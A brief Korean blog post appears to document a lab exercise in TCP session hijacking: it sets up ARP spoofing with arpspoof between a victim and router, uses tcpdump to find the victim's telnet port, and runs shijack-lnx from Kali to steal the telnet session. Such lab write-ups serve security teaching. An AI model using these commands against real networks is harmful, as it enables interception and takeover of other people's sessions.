실습 환경:
Victim : 192.168.100.20
Server : 192.168.100.131
Hacker: 192.168.100.128
Server에서 telnet 서버가 돌고 있고 Victim이 클라이언트로 접속하는 상황이다.
ARP 스푸핑을 하기 위해 세팅
$ sudo arpspoof -i eth0 -t [Victim IP Address] [Router IP Address]
$ sudo arpspoof -i eth0 -t [Router IP Address] [Victim IP Address]이렇게 하면 세션하이제킹을 위한 준비가 완료된다.
$ sudo tcpdump -i [네트워크 인터페이스명] src [Victim IP Address]
여기서 클라이언트의 telnet 세션의 포트를 확인한다.
그리고 shijack-lnx을 실행하면 세션을 하이제킹하여 칼리에서 텔넷의 세션을 훔칠 수 있다.
'network' 카테고리의 다른 글
| tcpdump 사용법 (0) | 2024.09.13 |
|---|---|
| [데이터 통신] Chapter 12 매체 접근 제어 (MAC) 연습 문제 & 정답 (0) | 2023.06.15 |
| [데이터 통신] Chapter 11 데이터 링크 제어 DLC 연습 문제 & 정답 (0) | 2023.06.15 |
| [데이터 통신] Chapter 10 오류 검출과 오류 정정 연습 문제 & 정답 (0) | 2023.06.14 |
| [데이터 통신] Chapter 09 데이터 링크층 개요 연습 문제 & 정답 (0) | 2023.06.13 |
